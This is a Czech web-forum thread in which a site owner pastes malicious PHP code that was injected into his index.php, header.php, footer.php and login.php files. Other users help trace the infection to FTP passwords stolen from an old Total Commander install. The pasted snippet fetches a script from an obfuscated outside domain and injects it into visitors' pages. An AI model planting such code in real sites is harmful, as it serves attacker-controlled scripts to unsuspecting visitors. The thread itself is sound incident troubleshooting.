Do všech souborů index.php přibyl kus kódu. WTF?!

[Trinom]

Zdravíčko, řeším takový nepříjemný problém na serveru. Do každého souboru index.php, header.php, footer.php a login.php mi před pár dny (15.5.) přibyl kus kódu

Kód: Vybrat vše

<?php
#7090da#
error_reporting(0); ini_set('display_errors',0); $wp_a6850 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_a6850) && !preg_match ('/bot/i', $wp_a6850))){
$wp_a096850="http://"."tag"."includes".".com/includes"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_a6850);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_a096850);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_6850a = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_6850a,1,3) === 'scr' ){ echo $wp_6850a; }
#/7090da#
?>
<?php

?>

Netuší někdo, kde se to tam mohlo vzít a jak se proti tomu bránit? Je to i u dalších uživatelů, takže se to tam nejspíš nedostalo přes FTP. Díky

[CageJ]

tu na fore?
Je to wordpress alebo webphp?

[Trinom]

na mojem soukromém. neběží tam žádný RS.

[Sten]

uložené heslo v total comanderu?

[Trinom]

Myslíš, že to šlo z vnitřní sítě? Hesla v TC uložný mám, protože si je nepamatuju. Každopádně antivir, ani antispyware mi žádnej průser nehlásí.

[Sten]

už je to delší dobu, ale byl vir co napadal právě total comander a dostal se tak na FTP, a jak popisuješ, do indexů apod dával svůj kód - reklamy, popup a podobně.

[Caderom]

S tímhle typem malwaru mají antiviry evidentně trochu problém. Taky mi ho antivir před lety detekoval až několik dní po nákaze a útoku na web.

[Jey]

Tak novější verze (poslední dva roky minimálně) Total commanderu již hesla nekóduje jako plain text (čistý text) a nejsou tedy zpětně čitelná. I když je myslím potřeba vyplnit si tam master heslo. To už je pak na každém, jak se zařídí..

Jinak ano, vypadá to na automatický hack (úpravu) všech php souborů od nějakého viru.

Zkus ty php soubory (jednotlivě) poslat na virustotal.com, tam už možná budou mít ten škodlivý kód v databázi. Ale prakticky je to jen běžný php kód, který otevře soubor z jiného webu s php kódem a spouští jej (tam už asi nějaké neechtovní operace budou).

[Trinom]

Tak jsem projel log Proftpd a opravdu šel útok přes FTP. Takže změnit hesla a přeinstalovat Total Commander za novou verzi (měl jsem starou). AVG na mojem PC samozřejmě našlo kulový, což mě trošku znepokojuje. Ví se, jak se ta ludra šíří?

Jestli chce někdo zašťourat po zdroji, tak útok přišel z IP 85.214.196.184 aka h2128165.stratoserver.net (sídlí v Belíně).

Co se dívám, tak si prolezl celou adresářovou strukturu a podíval se do všech php, html, swf a js souborů.